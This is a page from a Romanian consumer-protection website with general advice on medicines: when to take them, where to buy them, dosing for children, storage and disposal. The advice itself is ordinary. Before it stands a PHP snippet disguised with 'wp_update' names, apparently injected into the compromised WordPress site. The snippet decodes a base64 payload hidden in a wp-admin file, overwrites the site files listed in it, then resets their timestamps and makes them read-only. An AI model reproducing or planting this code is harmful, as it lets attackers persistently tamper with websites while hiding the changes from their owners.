$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Protectia-Consumatorilor.ro – o9atitudine! te invata ce trebuie sa stii despre medicamente! – O noua atitudine

Când să consumăm medicamente?

Nu trebuie să consumăm medicamente decât la indicaţia medicului! Pe piaţă există medicamente care au nevoie de reţetă/ prescripţie medicală dar şi medicamente care nu au nevoie de astfel de prescripţii pentru a fi comercializate în farmacii.

Medicamentele care au nevoie de prescripţii speciale sunt restricţionate în comercializare, acordându-se atenţie deosebită copiilor care nu au acces la consumul acestor medicamente, respectiv persoanelor alergice la anumite componente ale medicamentelor. Medicamentele – indiferent că au comercializarea restricţionată sau nu – pot crea alergii (sau alte efecte secundare).

Atenţie deosebită trebuie acordată efectelor adverse ale medicamentelor precum şi incompatibilităţilor în consumarea simultană a anumitor medicamente!

Este important să citeşti cu atenţie prospectul medicamentelor, să respecţi indicaţiile medicului şi să consulţi medicul în legatură cu orice neclaritate în administrarea medicamentelor!

2. De unde să cumpărăm medicamente?

Ce precauţii să luăm la cumpărarea unui medicament? Este recomandat să cumperi medicamente doar din farmacii. În cazul în care te decizi să le achiziţionezi de pe Internet, este recomandat ca vânzătorul electronic, în calitate de “spaţiu de vânzare”, să fie foarte bine verificat.

3. Cum să administrăm medicamentele?

În ambalajul sau pe eticheta fiecărui medicament, există un prospect, o listă cu informaţii specifice. Citeşte cu atenţie aceste informaţii şi fi atent la modul lor de administrare (frecvenţa şi intervalul de timp dintre administrări şi recomandarea de administrare înainte sau după masă) şi la atenţionările legate de consumul lor. Atenţie deosebită trebuie să se acorde antibioticelor! Citeşte cu atenţie dozele de administrare pentru a nu dubla sau înjumătăţi din grabă doza corectă. La copii, când eşti grăbit este uşor să confunzi “1/2” cu “2” şi invers.

Nu administra medicamente în doze concentrate sau de atac, duble faţă de recomandări, şi mai ales nu administra unui bebeluş cantităţi destinate copilului mare! Mai mult medicament nu înseamnă vindecare mai rapidă, căci dozele sunt bazate pe cantitatea de medicament care este sigură şi nu pe severitatea bolii.

În cazul administrării din greşeală a unei doze mai mari de medicament, este posibil ca acesta să nu aibă efecte secundare, dar mai bine dă un telefon medicului tău pentru a fi sigur de lipsa efectelor secundare la administrarea unei doze mai mari.

Administrarea oricărui antibiotic, trebuie să fie prescrisă de către medic, nu pentru orice creştere a temperaturii sau pentru o banală durere de gât sau tuse, să ne apucăm să înghiţim antibiotice fără recomandare medicală.

În ce priveşte administrarea medicamentelor la copii, trebuie să cunoşti greutatea precisă a copilului, deoarece dozele de medicamente comune (şi chiar de antibiotice prescrise) pentru copiii sub 2 ani sunt bazate pe greutatea copilului şi nu pe vârsta acestuia.

Agită sticluţele cu medicamente lichide înainte de a le administra, dacă acest lucru e menţionat în instrucţiunile de administrare. Astfel eşti sigur că toate ingredientele sunt uniform distribuite.

Nu confunda “linguriţa” (în engleză cu prescurtarea tsp sau t) cu “lingura” (în engleză cu prescurtarea TBSP sau T), căci “nu există nici un medicament din care copilul tău să aibă nevoie de o lingură întreagă”. Deci, pentru copii nu gândi dozele în linguri ci în linguriţe.

Nu face aproximări ale dozelor prescrise, foloseşte o măsură gradată (adesea medicamentul se comercializează cu o astfel de seringa sau pipeta).

4. Cum să păstrăm/depozităm medicamentele?

Medicamentele se păstrează în cutie în limitele termenului lor de valabilitate. Alege locuri de păstrare răcoroase şi uscate, departe de accesul copiilor!

Atenţie la medicamentele cu gust nu foarte placut, mai ales în cazul copiilor, când ele se administrează cu zahăr sau un sirop dulce. Se creează ideea că medicamentele sunt bomboane, pe care ulterior copilul va fi tentat să le înghită.

Păstrează medicamentele în ambalajele originale, în cazul că instrucţiunile de administrare şi ingredientele nu sunt precizate complet pe sticluţe. Dacă ai pierdut eticheta sau instrucţiunile de utilizare a unui medicament mai bine-l arunci, decât să ghiceşti la ce şi cum se foloseşte.

Multe antibiotice (şi chiar şi alte medicamente) trebuie păstrate în frigider. Unele pot fi lăsate la temperatura camerei pentru câteva minute, iar altele trebuie ţinute la rece în mod constant. De aceea este bine să întrebi farmacistul asupra instrucţiunilor de păstrare.

Păstrează medicamentele care nu trebuie ţinute la frigider într-un loc rece şi uscat, nu în dulăpiorul din baie, deoarece se pot încălzi şi umezi de la duş.

5. Cum se îndepărtează medicamentele din consum?

Este recomandat sa arunci medicamentele expirate împreună cu cutia lor.

Sursa: Dolceta

By o9admin